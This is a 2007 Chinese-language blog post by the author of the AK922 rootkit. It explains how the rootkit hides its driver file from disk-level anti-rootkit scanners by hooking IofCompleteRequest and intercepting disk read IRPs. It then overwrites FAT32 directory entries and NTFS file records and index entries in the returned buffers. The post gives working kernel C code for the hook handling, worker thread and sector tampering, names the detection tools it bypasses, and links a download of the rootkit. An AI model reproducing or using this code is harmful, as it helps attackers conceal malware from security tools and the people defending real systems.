AK922: 突破磁盤低級檢測實現文件隱藏

AK922: 突破磁盤低級檢測實現文件隱藏
作者：Azy
email: Azy000@gmail.com
完成于：2007-08-08

   目前，一些已公開的主流anti-rootkit檢測隱藏文件主要有兩種方法：第一種是文件系統層的檢測，屬于這一類的有icesword，darkspy，gmer等。第二種便是磁盤級別的低級檢測（Disk Low-Level Scanning），屬于這一類的ark也很多，典型代表為rootkit unhooker，filereg（is的插件），rootkit revealer，blacklight等。當然，還有一些工具，它們在應用層上通過調用ZwQueryDirectoryFile來實施檢測。
   驅動也好，應用也罷，說白了就是直接或間接發送IRP到下層驅動。第一類的發送到FSD中（fastfat.sys/ntfs.sys），第二類被發送到磁盤驅動（disk.sys），而后IRP便會攜帶相應的文件信息返回，這時上層應用再根據返回信息進行處理和判斷。但是由于Disk級比FS級更底層，IRP返回給我們的是更加接近數據原始組織方式的磁盤扇區信息，所以在Disk層上實施文件檢測可以得到更令人信服的結果。但這并不等于說這類檢測不能被擊敗。本文就將介紹一種繞過該類檢測的實現方法，當然，這也是在AK922中使用的。
   對于要實現文件隱藏的RK，與其說是“繞過”，還不如說是“攔截” -- 掛鉤某些內核函數調用，以便在返回上層之前我們有機會過濾掉待隱藏文件的信息。
   AK922采用的方法是Hook內核函數IofCompleteRequest。這個函數很有意思，因為它不僅是一個幾乎在任何驅動中都要調用的函數，而且參數中正好含有IRP。有了IRP，就有了一切。這些特性決定了它很適合做我們的“傀儡”。但更重要的是，一般在驅動中調用IofCompleteRequest之時IRP操作都已完畢，IRP中相關域已經填充了內容，這就便于我們著手直接進行過濾而不用再做諸如發送IRP安裝完成例程之類的操作。
   下面就著重說一下工作流程：
   首先，判斷MajorFunction是不是IRP_MJ_READ以及IO堆棧中的DeviceObject是否是磁盤驅動的設備對象，因為這才是我們要處理的核心IRP，所有ark直接發送到Disk層的IRP在這里都可以被攔截到。
   接下來的處理要特別注意，進入到這里時IRQL是在APC_LEVEL以上的，因此我們不能碰任何IRP中的用戶模式緩沖區，一碰極有可能藍，也就是說我們不能直接處理相關磁盤扇區信息，而必須通過ExQueueWorkItem排隊一個WorkItem的方法來處理。除此之外，由于Disk層在設備堆棧中處于靠下的位置，大部分IRP發到這里時當前進程上下文早已不是原始IRP發起者的進程上下文了，這里的發起者應理解為ark進程。幸運的是在IRP的Tail.Overlay.Thread域中還保存著原始ETHREAD指針，為了操作用戶模式緩沖區，必須調用KeAttachProcess切到IRP發起者的上下文環境中，而這個工作只能在處于PASSIVE_LEVEL級上的工作者線程中執行。在DISPATCH_LEVEL級上，做的事越少越好。
   剛開始我還分兩種情況進行處理：因為并不是所有的IRP都不處在原始上下文中，比如icesword發的IRP到這里還是處在icesword.exe進程中的，這時我認為可以不用排隊工作項，這樣就可以節省很多系統資源，提高過濾效率。于是我試圖在DISPATCH_LEVEL級上直接操作用戶緩沖區，但這根本行不通。驅動很不穩定，不一會就藍了。故索性老老實實地排隊去了，然后再分情況處理。代碼如下：

// 處理Disk Low-Level Scanning
if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)
{    
        
    orgnThread = Irp->Tail.Overlay.Thread;
    orgnProcess = IoThreadToProcess(orgnThread);
        
    if(Irp->MdlAddress)
    {        
        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);
            
        // UserBuffer必須有效
        if(UserBuffer)
        {                    
            
            if(KeGetCurrentIrql() == DISPATCH_LEVEL)
            {                    
            
                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));
                
                WorkerCtx->UserBuffer = UserBuffer;
                WorkerCtx->Length = irpSp->Parameters.Read.Length;
                WorkerCtx->EProc = orgnProcess;
                
                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);
                                
                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);
            }
        }
        
    }
}
  

   來到工作者線程，到了PASSIVE_LEVEL級上，切換上下文之后，似乎安全多了。但是以防萬一，操作用戶模式緩沖區之前還是要調用ProbeForXxx函數先判斷一下。相關代碼如下：

VOID WorkerThread(PVOID Context)
{
    KIRQL irql;
    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;
    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;
    //PMDL mdl;
        

    if(((PWORKERCTX)Context)->UserBuffer)
    {
        if(eproc != currProc)
        {

            KeAttachProcess(eproc);

            __try{
            
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){

                //DbgPrint("we can't op the buffer now :-(");
                KeDetachProcess();    
                return;
            }
            
            KeDetachProcess();    
            
        }else{

            __try{
            
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }

            __except(EXCEPTION_EXECUTE_HANDLER){}
        }
    
    }
}

   準備工作終于算是做得差不多了，下面就開始真正涂改磁盤扇區內容了。這里將涉及到FAT32和NTFS磁盤文件結構，我先把要用到的主要結構列出來，其余的大家可以參考《NTFS Documentation》。

typedef struct _INDEX_HEADER{
    UCHAR            magic[4];
    USHORT            UpdateSequenceOffset;
    USHORT            SizeInWords;
    LARGE_INTEGER    LogFileSeqNumber;
    LARGE_INTEGER    VCN;
    ULONG            IndexEntryOffset;    // needed!
    ULONG            IndexEntrySize;
    ULONG            AllocateSize;
}INDEX_HEADER, *PINDEX_HEADER;


typedef struct _INDEX_ENTRY{
    LARGE_INTEGER        MFTReference;
    USHORT            Size;                // needed!
    USHORT            FileNameOffset;
    USHORT            Flags;
    USHORT            Padding;
    LARGE_INTEGER        MFTReferParent;
    LARGE_INTEGER        CreationTime;
    LARGE_INTEGER        ModifyTime;
    LARGE_INTEGER        FileRecModifyTime;
    LARGE_INTEGER        AccessTime;
    LARGE_INTEGER        AllocateSize;
    LARGE_INTEGER        RealSize;
    LARGE_INTEGER        FileFlags;
    UCHAR            FileNameLength;
    UCHAR            NameSpace;
    WCHAR            FileName[1];
}INDEX_ENTRY, *PINDEX_ENTRY;

   在讀取磁盤文件信息時每次都是以一個扇區大小（512 bytes）的整數倍進行的，如果不了解相應卷的組織形式和數據結構，那么感覺就是數據多而繁雜，搜索效率也很低。但輔以上述結構便可快速定位待隱藏文件并進行涂改。這里不得不說一句，算法的高效是很重要的，如果采用暴力搜索的方式，那么系統BSOD的概率會大大增加。
   在FAT32卷上，當AK922搜索到文件AK922.sys的目錄項時，將其0x0偏移處的文件名的第一個字節置為"0xe5"，即標記為刪除。這樣即可達到欺騙ark的目的。但為了更加隱蔽，不讓winhex察覺出來，最好把文件名全部清0。
   處理NTFS卷稍微麻煩些，文件記錄和索引項都要抹干凈，具體實現見代碼，這里不再贅述。

VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)
{
    ULONG i;
    BOOLEAN bIsNtfsIndex;
    BOOLEAN bIsNtfsFile;
    ULONG offset = 0;
    ULONG indexSize = 0;
    PINDEX_ENTRY currIndxEntry = NULL;
    PINDEX_ENTRY preIndxEntry = NULL;
    ULONG currPosition;

    
    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);
    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);

    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)
    {            
    
        for(i = 0; i < BufLen/0x20; i++)
        {
            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))
            {

                *(PUCHAR)UserBuf        = 0xe5;
                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;

                break;
                    
            }

            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);
        
        }

    } else if(bIsNtfsFile) {

        //DbgPrint("FILE0...");

        for(i = 0; i < BufLen / FILERECORDSIZE; i++)
        {
            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))
            {
                memset((PVOID)UserBuf, 0, 0x4);
                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);
                break;
            }
                
            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);
                
        }
            
    } else if(bIsNtfsIndex) {
                            
        //DbgPrint("INDX...");
        // Index Entries
        
        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;
        indexSize = BufLen - offset;
        currPosition = 0;

        currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset);
        //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize);
                
        while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0)
        {
            if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9))
            {
                memset((PVOID)currIndxEntry->FileName, 0, 18);

                if(currPosition == 0)
                {
                    ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size;
                    break;
                }

                preIndxEntry->Size += currIndxEntry->Size;
                
                break;
            }

            currPosition += currIndxEntry->Size;
            preIndxEntry = currIndxEntry;
            currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size);
                    
        }
    }
}

   水平有限，歡迎大家與我交流。


參考資料：

[1] - 《NTFS Documentation》
[2] - Azy，《IceSword & Rootkit Unhooker驅動簡析》

---------

關于AK922(AzyKit)：我寫的一個只實現文件隱藏的RK，可以bypass本文提到的所有ark。
Download @ http://www.wiiupload.net/sf/65b4e75ec4

posted on 2007-10-12 11:58 葉子 閱讀(658) 評論(0)  編輯 收藏 引用 所屬分類: 網絡安全 、技術研究